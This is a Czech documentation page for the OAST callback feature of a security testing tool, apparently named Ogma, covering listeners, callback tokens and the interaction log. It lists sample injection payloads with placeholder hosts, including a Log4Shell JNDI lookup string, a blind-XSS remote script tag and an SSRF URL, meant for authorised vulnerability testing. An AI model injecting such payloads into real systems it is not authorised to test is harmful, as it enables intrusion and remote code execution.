---
url: https://docs.ogmabox.com/cs/app/utilities/oast.md
description: >-
  Nastavte v Ogma zpětná volání pro testování bezpečnosti aplikací mimo běžný
  komunikační kanál.
---

# OAST {#oast}

OAST (Out-of-Band Application Security Testing) odhaluje zranitelnosti, které neposkytují viditelnou odpověď – místo toho cíl naváže odchozí spojení s naslouchající službou pod vaší kontrolou, čímž problém potvrdí.

## Jak to funguje {#how-it-works}

Ogma spouští místní naslouchající služby pro více protokolů. Když cílová aplikace kontaktuje některou z nich, interakce se zaznamená spolu se zdrojovou IP adresou, časovým razítkem, přijatými daty a vloženým tokenem.

### Protokoly naslouchajících služeb {#listener-protocols}

| Protokol | Výchozí port | Použití |
|---|---|---|
| HTTP | Nastavitelný | SSRF, slepé XSS, webhooky |
| HTTPS | Nastavitelný | SSRF přes TLS |
| DNS | Nastavitelný | Slepá injekce, XXE, log4shell |
| SMTP | Nastavitelný | Injekce do e-mailových hlaviček, SSRF na poštovní služby |

V panelu nastavení OAST nastavte porty naslouchajících služeb a doménové jméno používané ve vygenerovaných tokenech.

## Vygenerování tokenu zpětného volání {#generating-a-callback-token}

1. Otevřete **Pomocné nástroje > OAST**.
2. Klikněte na **+ Nový** a poté na **Vytvořit**. Každý token je jedinečný pro daný test.
3. Zkopírujte token. Obsahuje doménu vaší naslouchající služby a jedinečný identifikátor, aby bylo možné interakce přiřadit ke konkrétnímu testu.

Příklad formátu tokenu: `[unique-id].[your-oast-domain]`

## Použití tokenů v payloadech {#using-tokens-in-payloads}

Vložte token zpětného volání do libovolného pole, které může přimět aplikaci navázat odchozí spojení:

* **SSRF** – použijte token HTTP/HTTPS jako cílovou URL: `https://[token]/`
* **XXE** – odkažte na token v DOCTYPE nebo v URL externí entity.
* **Log4Shell** – vložte jej do hlavičky: `${jndi:ldap://[token]/a}`
* **Slepé XSS** – vložte jej jako src skriptu: `<script src="https://[token]/x.js"></script>`
* **Injekce SMTP** – použijte jej jako cílovou adresu nebo URL v e-mailových hlavičkách.

## Protokol interakcí {#interactions-log}

Panel interakcí zobrazuje každé přijaté zpětné volání:

| Sloupec | Popis |
|---|---|
| Čas | Kdy byla interakce přijata |
| Protokol | HTTP, HTTPS, DNS nebo SMTP |
| Zdrojová IP | IP adresa, ze které bylo navázáno spojení |
| Token | Který token byl kontaktován |
| Data | Cesta požadavku, název dotazu DNS nebo data SMTP |

Klikněte na libovolný řádek a zobrazte úplné podrobnosti interakce včetně hlaviček a těla požadavku, pokud jsou pro daný protokol relevantní.

## Přiřazování interakcí k testům {#matching-interactions-to-tests}

Protože je každý token jedinečný, můžete do různých parametrů nebo požadavků vložit různé tokeny a přesně určit, které místo vložení vyvolalo zpětné volání.

## Související stránky {#related-pages}

* [Skener](./scanner.md)
* [Nálezy](../findings.md)
